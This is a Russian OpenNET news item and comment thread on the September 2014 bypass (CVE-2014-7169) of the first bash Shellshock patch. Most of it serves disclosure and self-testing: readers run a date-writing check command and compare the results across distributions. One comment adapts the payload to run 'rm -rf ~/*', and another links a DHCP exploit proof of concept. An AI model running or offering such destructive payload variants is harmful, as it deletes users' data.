The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

25.09.2014 09:52  Найден способ обхода патча, устраняющего уязвимость в bash

Выявлены методы (CVE-2014-7169) обхода патча, представленного вчера для устранения критической уязвимости в Bash. Для решения проблемы подготовлен новый патч. В дистрибутивах проблема пока остаётся неисправленной.

Для проверки на наличие обходного пути эксплуатации уязвимости можно использовать команду (успешно срабатывает после установки вчерашнего обновления bash в Ubuntu и Debian):


   env X='() { (a)=>\\' sh -c "echo date"; cat echo

Кроме того, уже проведены попытки массового сканирования серверов на предмет наличия уязвимости в Bash. Первый же эксперимент выявил около 3 тысяч хостов, подверженных уязвимости в Bash при запросе корневой страницы по IP, без заполнения заголовка Host (при полноценном сканировании с указанием корректных имён домена таких сайтов может оказаться в 50 раз больше). Организация целевых атак на конкретные CGI-скрипты, например, на /cgi-sys/defaultwebpage.cgi из CPanel, позволяет как минимум в 10 раз расширить область действия атаки. Так как уязвимость очень проста в эксплуатации, не исключается появление в ближайшее время червей, нацеленных на поражение конкретных проблемных CGI-скриптов.

Дополнение: доступен PoC, показывающий взлом системы через DHCP-клиент при обработке параметров от подконтрольного злоумышленнику DHCP-сервера. Проблема усугубляется тем, что в большинстве случаев DHCP-клиент работает с правами root.

  1. Главная ссылка к новости (https://bugzilla.redhat.com/sh...)
  2. OpenNews: Критическая уязвимость в bash, которая может привести к удалённому запуску команд
Лицензия: CC-BY
Тип: Интересно
Ключевые слова: bash
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Раскрыть все сообщения | RSS
 
  • 1.1, Аноним (-), 10:31, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]
  • +5 +/
    КСЖ. Все переходим на zsh?
     
     
  • 2.31, фыв (??), 13:36, 25/09/2014 [^] [ответить]    [к модератору]
  • –7 +/
    на dash
     
  • 2.45, InuYasha (?), 14:29, 25/09/2014 [^] [ответить]    [к модератору]
  • –1 +/
    +1
     
  • 2.51, Stax (ok), 15:14, 25/09/2014 [^] [ответить]    [к модератору]
  • +2 +/
    *
     
  • 2.52, Stax (ok), 15:20, 25/09/2014 [^] [ответить]     [к модератору]
  • +2 +/
    Переход вашего конкретного шелла ничего не даст - в нем такую уязвимость все рав... весь текст скрыт [показать]
     
     
  • 3.58, Аноним (-), 17:11, 25/09/2014 [^] [ответить]     [к модератору]  
  • +/
    Реальная проблема - кластерфак с экранированием и специальной интерпретацией все... весь текст скрыт [показать]
     
     
  • 4.61, Stax (ok), 18:23, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    Только в этом случае опять же не имеет значения, какой у вас шелл. Будь у вас хоть супер-секьюрный dash, env X='() { (a)=>\' bash -c "echo date"; cat echo сработает, т.к. ломает свежезапущенный bash.
     
     
  • 5.66, Аноним (-), 19:09, 25/09/2014 [^] [ответить]     [к модератору]  
  • +/
    В случае hijack ввода через терминал - да, тип шелла пофигу Не пофигу тип терми... весь текст скрыт [показать]
     
     
  • 6.68, Психиатр (ok), 20:00, 25/09/2014 [^] [ответить]    [к модератору]  
  • –1 +/
    шшшшш тихо!
    а то поцтеринг услышит
     
     
  • 7.102, Аноним (-), 17:15, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > а то поцтеринг услышит

    Блин, надо ему написать, доджен же кто-то привести этот пи..ц в порядок. А ему уже привычно тумаки получать за такую работенку :)

     
     
  • 8.116, Stax (ok), 12:37, 27/09/2014 [^] [ответить]     [к модератору]  
  • +/
    Мне кажется, не его специализация ему демоны подсистемы нравится писать avahi,... весь текст скрыт [показать]
     
  • 7.122, Аноним (-), 09:08, 05/10/2014 [^] [ответить]    [к модератору]  
  • +/
    > шшшшш тихо!
    > а то поцтеринг услышит

    он спит


     
  • 6.76, Stax (ok), 21:00, 25/09/2014 [^] [ответить]    [к модератору]  
  • +1 +/
    Ну есть, например, Terminology: http://enlightenment.org/p.php?p=about/terminology&l=en
     
     
  • 7.103, Аноним (-), 17:16, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > Ну есть, например, Terminology

    В нем выпилили совместимость с древними терминалами, escape кодами и прочей мутью, позволяющей уйму внеплановой активности если за вводом недоглядеть?

     
  • 2.73, GotF (ok), 20:43, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > Все переходим на zsh?

    Угу. И сразу ждём поток CVE для Zsh :)

     
  • 2.80, Аноним (-), 22:08, 25/09/2014 [^] [ответить]    [к модератору]  
  • +1 +/
    > КСЖ. Все переходим на zsh?

    Судя по монструозности zsh, ждать подобной уязвимости в его случае придётся ещё меньше. Тогда уже KSH, а лучше - dash или что-то столь же минималистичное.

     
  • 1.2, zeroDroid (?), 10:39, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    Переходим на ksh93 ))))))))))))))))))
     
     
  • 2.47, Аноним (-), 14:58, 25/09/2014 [^] [ответить]    [к модератору]  
  • –1 +/
    csh ftw? :)
     
     
  • 3.81, Аноним (-), 22:19, 25/09/2014 [^] [ответить]    [к модератору]  
  • –1 +/
    > csh ftw? :)

    Вот вы все скрипты и переписывайте. Вместе с POSIX. :-\

     
     
  • 4.111, Аноним (-), 18:46, 26/09/2014 [^] [ответить]     [к модератору]  
  • +/
    Да, скрипты это круто Особенно когда вам ремотный DHCP сервер команд на выполне... весь текст скрыт [показать]
     
  • 1.3, Гость (??), 10:42, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    > env X='() { (a)=>\' sh -c "echo date"; cat echo

    А что должно получиться?

     
     
  • 2.4, Аноним (-), 10:50, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    Дату вывести.
     
     
  • 3.13, Аноним (-), 11:17, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    env X='() { (a)=>\' sh -c "echo date"; cat echo
    date
    cat: echo: Нет такого файла или каталога

    кубунта с "вчерашним обновлением" :)

     
     
  • 4.34, Аноним (-), 13:58, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    У вас, видимо, sh - это dash, а не bash.

    Не вводите людей в заблуждение.

     
  • 4.59, Аноним (-), 17:12, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > кубунта с "вчерашним обновлением" :)

    Потому что надо было так: env X='() { (a)=>\' bash -c "echo date"; cat echo

    Работает.

     
  • 1.9, ALex_hha (ok), 11:01, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    $ env X='() { (a)=>\' sh -c "echo date"; cat echo
    sh: X: line 1: syntax error near unexpected token '='
    sh: X: line 1: ''
    sh: error importing function definition for 'X'
    Thu Sep 25 06:59:29 UTC 2014

    так и задумано?

     
     
  • 2.32, Аноним (-), 13:45, 25/09/2014 [^] [ответить]     [к модератору]  
  • +/
    строка Thu Sep 25 06 59 29 UTC 2014 находится в файле echo, появившемся в ре... весь текст скрыт [показать]
     
     
  • 3.43, Аноним (-), 14:11, 25/09/2014 [^] [ответить]     [к модератору]  
  • +/
    Дальше можно было и не продолжать Зачем перезаписывать какое-то там echo, есл... весь текст скрыт [показать]
     
     
  • 4.54, Michael Shigorin (ok), 16:07, 25/09/2014 [^] [ответить]     [к модератору]  
  • –1 +/
    Очевидно, это был терпеливый пример Более доходчивый по Бармину всё же стёр, х... весь текст скрыт [показать]
     
     
  • 5.94, none_first (ok), 13:30, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    типа такой? env X='() { (a)=>\' bash -c "test_ echo rm -rf ~/*"; . test_
     
  • 1.10, Аноним (-), 11:07, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Kubuntu 14.04, после патча не работает:

    > env X='() { (a)=>\' sh -c "echo date"; cat echo
    > date
    > cat: echo: No such file or directory

     
     
  • 2.36, Аноним (-), 14:00, 25/09/2014 [^] [ответить]    [к модератору]  
  • +2 +/
    > Kubuntu 14.04, после патча не работает:
    >> env X='() { (a)=>\' sh -c "echo date"; cat echo
    >> date
    >> cat: echo: No such file or directory

    И до патча не должно, если sh = dash.

     
  • 1.11, CssfPZS (ok), 11:08, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • –2 +/
    OpenSUSE 13.1:

    env X='() { (a)=>\' sh -c "echo date"; cat echo
    sh: X: line 1: syntax error near unexpected token '='
    sh: X: line 1: ''
    sh: error importing function definition for 'X'
    Thu Sep 25 09:05:13 CEST 2014

    CentOS 7:

    env X='() { (a)=>\' sh -c "echo date"; cat echo
    sh: X: line 1: syntax error near unexpected token '='
    sh: X: line 1: ''
    sh: error importing function definition for 'X'
    Thu Sep 25 09:04:28 CEST 2014

    Получается, что не рпаботает.
    >Для проверки на наличие обходного пути эксплуатации уязвимости можно использовать команду (успешно срабатывает после установки вчерашнего обновления bash в Ubuntu и Debian):

    Это точно не дистрибутиво специфичный баг?

     
     
  • 2.14, h31 (ok), 11:25, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    Это обходной путь, срабатывает, только если _уже_ установлен патч.
     
     
  • 3.15, CssfPZS (ok), 11:27, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    На обеих машинах патч установлен.
     
     
  • 4.21, тигар (ok), 12:20, 25/09/2014 [^] [ответить]    [к модератору]  
  • +4 +/
    > На обеих машинах патч установлен.

    и тебя не смущает тот факт, что оно выводит дату?

     
  • 4.60, Аноним (-), 17:15, 25/09/2014 [^] [ответить]    [к модератору]  
  • –3 +/
    > На обеих машинах патч установлен.

    Вообще-то, пример сработал. Заметь, команда с датой - выполнилась. Что самое прикольное, фанату редхата это объясняют скрипткидисы от убунту и бсд :).

     
  • 2.20, Аноним (-), 12:20, 25/09/2014 [^] [ответить]    [к модератору]  
  • +4 +/
    Работает, раз файл echo создаётся.
     
     
  • 3.23, CssfPZS (ok), 12:27, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > Работает, раз файл echo создаётся.

    Ты прав

     
  • 1.12, Gadd (?), 11:13, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Ubuntu 12.04
    ~$ env X='() { (a)=>\' sh -c "echo date"; cat echo
    date
    cat: echo: Нет такого файла или каталога

    После вчерашнего патча, новый патч не ставил

     
     
  • 2.30, neol (ok), 13:36, 25/09/2014 [^] [ответить]    [к модератору]  
  • +1 +/
    Для Ubuntu/Debian работает так:
    env X='() { (a)=>\' bash -c "echo date"; cat echo

    Там sh смотрит на dash, в котором уязвимости нет.

     
     
  • 3.48, Аноним (-), 15:05, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > Там sh смотрит на dash, в котором уязвимости нет.

    Попробовал явно запустить /bin/bash, результат аналогичный.

     
     
  • 4.49, Аноним (-), 15:08, 25/09/2014 [^] [ответить]    [к модератору]  
  • –1 +/
    > Попробовал явно запустить /bin/bash, результат аналогичный.

    А, тормознул, надо bash еще и в самой конструкции. Вон та инструкция для бздунов работает и на убунтах. Pwnage такой pwnage...

     
  • 1.17, Умник (?), 11:43, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    FreeBSD

    env X='() { (a)=>\' sh -c "echo date"; cat echo
    date
    cat: echo: No such file or directory

     
     
  • 2.18, Xaionaro (ok), 12:11, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > FreeBSD

    А причём тут FreeBSD? Или намёк на то, что в их ports уже давно используется patch для bash, который исправляет эту проблему?

     
     
  • 3.22, тигар (ok), 12:22, 25/09/2014 [^] [ответить]     [к модератору]  
  • +1 +/
    не поверишь, но вчерашний патч для ЭТОГО там есть, в портах, да ... весь текст скрыт [показать]
     
     
  • 4.50, Xaionaro (ok), 15:13, 25/09/2014 [^] [ответить]     [к модератору]  
  • +/
    Он там появился до данной новости или после ... весь текст скрыт [показать]
     
     
  • 5.56, тигар (ok), 16:19, 25/09/2014 [^] [ответить]     [к модератору]  
  • –1 +/
    r369185 2014-09-24 20 05 47 0300 ... весь текст скрыт [показать]
     
     
  • 6.69, Xaionaro (ok), 20:01, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    Ну так бы и написали, что в портах FreeBSD проблема была устранена r369185 2014-09-24 20:05:47 +0300..

    IMO, было совершенно непонятно, что вы хотели сказать в своём первом комментарии.

     
     
  • 7.79, тигар (ok), 21:56, 25/09/2014 [^] [ответить]     [к модератору]  
  • +2 +/
    прошу прощения, как-то не привычно, когда на данном ресурсе спрашивают просто по... весь текст скрыт [показать]
     
  • 3.41, Аноним (-), 14:05, 25/09/2014 [^] [ответить]    [к модератору]  
  • +7 +/
    > А причём тут FreeBSD? Или намёк на то, что в их ports
    > уже давно используется patch для bash, который исправляет эту проблему?

    Это намек на то, что фрибсдшники не понимают разницы между bash и sh.

    А как еще объяснить то, что на баш-специфичную уязвимость они тестируют именно sh?

     
     
  • 4.71, Куяврег (?), 20:17, 25/09/2014 [^] [ответить]    [к модератору]  
  • –4 +/
    а убунтохомяки всё осваивают телепатию. и что характерно - всё неудачно.
     
     
  • 5.109, Аноним (-), 18:24, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > а убунтохомяки всё осваивают телепатию. и что характерно - всё неудачно.

    Еще один образчик годного батхерта. Хомяки vs снобы: 2:0 :)

     
  • 2.28, Аноним (-), 13:02, 25/09/2014 [^] [ответить]    [к модератору]  
  • +2 +/
    Для фряхи и всем тем, у кого /bin/sh это не баш, нужно заменить в приведенной команде sh на bash:

    env X='() { (a)=>\' bash -c "echo date"; cat echo

     
     
  • 3.101, Аннонннн (?), 15:59, 26/09/2014 [^] [ответить]     [к модератору]  
  • +1 +/
    uname -rs FreeBSD 10 0-RELEASE-p9 echo BASH_VERSION 4 3 25 1 -release bas... весь текст скрыт [показать]
     
  • 1.24, Аноним (-), 12:47, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    А я уже давно сделал так:
    # emerge dash eselect-sh
    # eselect sh set dash
     
  • 1.25, Аноним (-), 12:48, 25/09/2014 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    ebuild U app-shells bash-4 2_p48-r1 4 2_p48 env X a sh -c ... весь текст скрыт [показать]
     
  • 1.26, Аноним (-), 12:49, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    Думаю, надо написать новый шелл для системдос, а баш выкинуть.
     
     
  • 2.37, Andrey Mitrofanov (?), 14:01, 25/09/2014 [^] [ответить]    [к модератору]  
  • +2 +/
    > Думаю, надо написать новый шелл для системдос, а баш выкинуть.

    ЛенартОСу не нужен шелл. Можно выкидывать сразу! ><//////>

     
  • 2.38, Аноним (-), 14:01, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > Думаю, надо написать новый шелл для системдос, а баш выкинуть.

    В системдос не должно быть шелла, ибо лишний вектор уязвимости, и Леннарт не одобряет.

     
     
  • 3.44, Andrey Mitrofanov (?), 14:13, 25/09/2014 [^] [ответить]     [к модератору]  
  • +2 +/
    Не, уязвимсость это новое Основная архитектурная идея s-d ещё c самого начала б... весь текст скрыт [показать]
     
     
  • 4.125, Аноним (-), 18:11, 08/10/2014 [^] [ответить]     [к модератору]  
  • –1 +/
    Ну, продолжай цепочку дальше Потому, что линуксойды относятся к разновидности ... весь текст скрыт [показать]
     
     
  • 5.130, Andrey Mitrofanov (?), 18:45, 08/10/2014 [^] [ответить]     [к модератору]  
  • +/
    Немедленно патчите броузер У вас тэг сарказьм http openforum vsluhforumID3 992... весь текст скрыт [показать]
     
  • 2.55, Шерлок Холмс из Опеннета (?), 16:15, 25/09/2014 [^] [ответить]    [к модератору]  
  • +2 +/
    test -d /run/systemd && echo "vulnerable"
     
  • 1.27, Аноним (-), 12:59, 25/09/2014 [ответить] [показать ветку] [···]     [к модератору]  
  • –7 +/
    Как бэ статистика опеннета говорит об обратном Успешно он сработал на Сюсе и Це... весь текст скрыт [показать]
     
     
  • 2.29, Аноним (-), 13:09, 25/09/2014 [^] [ответить]     [к модератору]  
  • +3 +/
    В генту пофиксили сегодня только около 10 утра - выкатили апдейт сразу в стейбл ... весь текст скрыт [показать]
     
     
  • 3.119, Аноним (-), 15:34, 28/09/2014 [^] [ответить]     [к модератору]  
  • –1 +/
    но у меня bash не установлен на FreeBSD т е для активации уязвимости мне необх... весь текст скрыт [показать]
     
  • 2.39, Аноним (-), 14:03, 25/09/2014 [^] [ответить]     [к модератору]  
  • +3 +/
    Статистика говорит о том, что на Убунту и ФриБСД сидят скрипт-киддисы, которые в... весь текст скрыт [показать]
     
     
  • 3.72, Куяврег (?), 20:40, 25/09/2014 [^] [ответить]     [к модератору]  
  • –1 +/
    не надо проецировать свои проблемы на других ... весь текст скрыт [показать]
     
     
  • 4.104, Аноним (-), 17:55, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > не надо проецировать свои проблемы на других.

    Диагностирован батхерт :)

     
     
  • 5.113, Гость (??), 21:49, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    От тебя большего и не ждали.
     
  • 3.91, Аноним (-), 11:12, 26/09/2014 [^] [ответить]     [к модератору]  
  • –1 +/
    Даже если предположить, что все Убунтоиды, ФриБСДшники и Гентумены ничего не зна... весь текст скрыт [показать]
     
  • 1.33, Аноним (-), 13:48, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    в tcsh тоже срабатывает - не только в bash.
     
     
  • 2.40, Andrey Mitrofanov (?), 14:05, 25/09/2014 [^] [ответить]    [к модератору]  
  • +2 +/
    > в tcsh тоже

    Нам ждать ещё и Hовостей "И я тоже!" от череды само-раскапывающихся xxxsh-стюардесс? Оживляж!

     
  • 1.46, vitalif (ok), 14:55, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Молодцы, обошли. А фиксить-то будут?
     
     
  • 2.75, Аноним (-), 20:57, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    Наверное нет.
     
  • 1.53, Аноним (-), 15:54, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Где фикс??? А-а-а-а, мы все умрём!!!
     
     
  • 2.64, XoRe (ok), 19:06, 25/09/2014 [^] [ответить]    [к модератору]  
  • +3 +/
    > Где фикс??? А-а-а-а, мы все умрём!!!

    Вы так говорите, как будто это что-то плохое

     
  • 1.70, Аноним (-), 20:02, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • –5 +/
    сила и мощь опенсорца: дыра есть, а исправлять её некому
     
     
  • 2.77, ананимас (?), 21:38, 25/09/2014 [^] [ответить]    [к модератору]  
  • +1 +/
    Fix CVE-2014-3659. The original fix in 25 was not enough.

    Obtained from: http://seclists.org/oss-sec/2014/q3/690 (bash developer)
    Security: CVE-2014-3659

     
  • 2.78, Xaionaro (ok), 21:52, 25/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > сила и мощь опенсорца: дыра есть, а исправлять её некому

    К моменту вашего комментария, проблема была исправлена на большинстве наших серверов.

     
     
  • 3.87, Аноним (-), 09:27, 26/09/2014 [^] [ответить]    [к модератору]  
  • –3 +/
    в ночи разродились, к моменту написания моего комментария и несколько часов после него, нихрена не было. Вместе с тем, у бздунов и гентушников весь день всё было ок, ибо патч им подогнали раньше.
     
     
  • 4.92, Xaionaro (ok), 11:30, 26/09/2014 [^] [ответить]     [к модератору]  
  • +/
    Ну, мы пытаемся делать защиту многослойной Если кто-то что-то взломает, ему пон... весь текст скрыт [показать]
     
     
  • 5.93, Аноним (-), 12:35, 26/09/2014 [^] [ответить]     [к модератору]  
  • +/
    Жалуюсь на немощный редхет, у которого есть исходники, работники и что там ещё, ... весь текст скрыт [показать]
     
     
  • 6.95, Xaionaro (ok), 13:43, 26/09/2014 [^] [ответить]     [к модератору]  
  • –1 +/
    Лично я ассоциирую Red Hat с Microsoft только уже в мире СПО Не думаю что сто... весь текст скрыт [показать]
     
     
  • 7.105, Аноним (-), 17:58, 26/09/2014 [^] [ответить]    [к модератору]  
  • –2 +/
    > Лично я ассоциирую Red Hat с Microsoft (только уже в мире СПО).

    Ну да, такие фаготы - 25% работы над ядром воротят. А в благодарность их с MS сравнивают. Довольно свинский подход.

     
     
  • 8.112, Аноним (-), 20:38, 26/09/2014 [^] [ответить]     [к модератору]  
  • +1 +/
    справедливый подход Превратить гну линукс в системдос это такая же срань, как и... весь текст скрыт [показать]
     
  • 8.118, Xaionaro (ok), 16:57, 27/09/2014 [^] [ответить]     [к модератору]  
  • –1 +/
    25 Откуда у вас такая информация Больше всего вносит Intel, и его доля и то л... весь текст скрыт [показать]
     
  • 3.96, Аноним (-), 14:07, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    На большинстве ваших, а на большинстве остальных? И всем дружно костыли городить в iptables? В дистрах заплатка не появилась. Вчерашняя не в счет, т к неполноценная.
     
     
  • 4.98, Xaionaro (ok), 15:28, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > В дистрах заплатка не появилась. Вчерашняя не в счет,
    > т к неполноценная.

    В каких «дистрах» заплатка не появилась?


     
     
  • 5.100, Аноним (-), 15:59, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    >> В дистрах заплатка не появилась. Вчерашняя не в счет,
    >> т к неполноценная.
    > В каких «дистрах» заплатка не появилась?

    убунта, арч, альт, другие не юзаю сейчас.

     
     
  • 6.106, Xaionaro (ok), 18:14, 26/09/2014 [^] [ответить]     [к модератору]  
  • +/
    Не пользую, не знаю 8230 Один мой коллега сказал, что там фактически сразу поя... весь текст скрыт [показать]
     
     
  • 7.108, Аноним (-), 18:23, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > Не пользую, не знаю…

    Приехал "дважды пофикшеный". Фикс на фикс - это круто!

     
  • 6.110, Аноном (?), 18:42, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    В убунтах давно появилась, я имею ввиду вторую.
     
     ....нить скрыта, показать (15)

  • 1.82, Аноним (-), 23:20, 25/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    В убунте сабжевая команда не работает, в арче ли альте работает (после обновлений)
     
     
  • 2.83, Аноним (-), 23:22, 25/09/2014 [^] [ответить]    [к модератору]  
  • –1 +/
    Вру. там просто sh ссылается на dash. Уязвимость есть.
     
  • 1.86, Michael Shigorin (ok), 07:25, 26/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • –2 +/
    [CODE]$ env X='() { (a)=>\' sh -c "echo date"; cat echo
    date
    cat: echo: Нет такого файла или каталога
    $ bash --version
    GNU bash, version 3.2.52(1)-release (x86_64-alt-linux-gnu)
    Copyright (C) 2007 Free Software Foundation, Inc.[/CODE]
    http://git.altlinux.org/gears/b/bash.git
     
     
  • 2.89, Аноним (-), 10:17, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    Тухлость тоже вариант, это да.
     
     
  • 3.107, Аноним (-), 18:22, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    > Тухлость тоже вариант, это да.

    Готов поспорить, CP/M неуязвима для этого бага :).

     
  • 3.127, Аноним (-), 18:15, 08/10/2014 [^] [ответить]     [к модератору]  
  • +1 +/
    ехидно Расскажи это ВВС США после войны в Югославии Продается два слегка по... весь текст скрыт [показать]
     
  • 2.97, Аноним (-), 15:22, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    env X='() { (a)=>\' bash -c "echo date"; cat echo
     
     
  • 3.99, Аноним (-), 15:58, 26/09/2014 [^] [ответить]    [к модератору]  
  • –1 +/
    В альте баш - дефолт, хотя у Шигорина может быть что угодно.
     
     
  • 4.129, Michael Shigorin (ok), 18:24, 08/10/2014 [^] [ответить]    [к модератору]  
  • +/
    > В альте баш - дефолт, хотя у Шигорина может быть что угодно.

    zsh, разумеется. :)

     
  • 3.120, timur (??), 17:37, 29/09/2014 [^] [ответить]    [к модератору]  
  • –1 +/
    Однако же
    $env X='() { (a)=>\' sh -c "echo date"; cat echo
    date
    cat: echo: No such file or directory
     
  • 1.88, Фанатик (?), 09:58, 26/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    А вот и PoC [1].

    [1] https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/

     
     
  • 2.90, Фанатик (?), 10:33, 26/09/2014 [^] [ответить]    [к модератору]  
  • +/
    Ну хоть Поттеринг нам написал netwrokd, который неуязвим(для конкретно этой ошибки)
     
  • 2.114, Аноним (-), 01:34, 27/09/2014 [^] [ответить]     [к модератору]  
  • +/
    на скриншотике слака уязвилась через dhcpcd есличо в слаке апдейтики приехали у... весь текст скрыт [показать]
     
  • 1.117, Аноним (-), 15:41, 27/09/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    REPL - зло.
     
  • 1.121, Никъ (?), 22:31, 04/10/2014 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    патчи к башу ваять - все равно что воду ситом вычерпывать.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor